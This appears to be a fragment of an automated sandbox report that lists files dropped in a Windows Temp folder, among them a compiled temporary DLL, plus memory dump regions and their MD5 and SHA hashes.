SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\CSC60297B08AA304B0F96162B44A9442652.TMP

MD5 1618c0fb414adfdc0e55f10fe3220dc8
SHA1 219e4cd8c6ead6029e5c6180d1b700f4f2bf2e36
SHA256 fc3c058707372dc8f51aa038d8fd9c62281ae6cf372416cef1b88825a4e4dd59
SHA512 e57871058d39da751bf8092191a865ec2f32f71f625f3d9a3c8f9594ec88730b7f975a88869636c4d63c2f7d5ad0b1fa9226adb1ea77246cfaffcacc433dbc3a

C:\Users\Admin\AppData\Local\Temp\RES2268.tmp

MD5 ae0ec87d0780cd281b85f0dab6d10796
SHA1 3d387c55123665f172ed50443d3cab4b54928ba6
SHA256 ab806d1372e5bb560a0ebf693dc5315462aee75c80c097ca71e53c2e6370508d
SHA512 3dc063df5e42e386f4d702c39e791cc414301e80f02ce6a64e3d07b2ac90acd53415ab3d2b79c9ae521d8b0bb3e7513df26e630a81cd37480861c022468f3781

C:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.dll

MD5 b867c862644547520312c4bf29fc946f
SHA1 869cdc4cc9bcc87c1112d6f487d11d8e7c693ee3
SHA256 6a5026cc589b8ca5db702fb8976a3daba5a94bf1ed1de8c8fd0cb7dc898fc707
SHA512 dccacf6de7b90e546507e9afd5ea17413d038bbd25348737a66bb8792d0c076f4ae71c1ae30c67449aac55407a9a12b29ddf34a618bc8481c7ad91fc427f079f

memory/4268-58-0x0000022A51850000-0x0000022A51858000-memory.dmp

memory/2176-60-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-63-0x00007FFF4EF6D000-0x00007FFF4EF6E000-memory.dmp

memory/2176-64-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-65-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-69-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 b78d36311a167ef513f6ed277b7929a0
SHA1 212dade9bf9fe79bdc92e77e56c3ea410cafc3b2
SHA256 3a56e0a4c14aaf0270f6871e6490a12696c233cd0bae0b7dfdd841e81ba1b811
SHA512 93f0d8b49d7a3570fedfe0917d6a4515584000f794270fd47fd23c83d6b0e4bebf083867ec0b2f8bd6fc1da6e403b31ee76b71213b7fdd173b20353c02c12445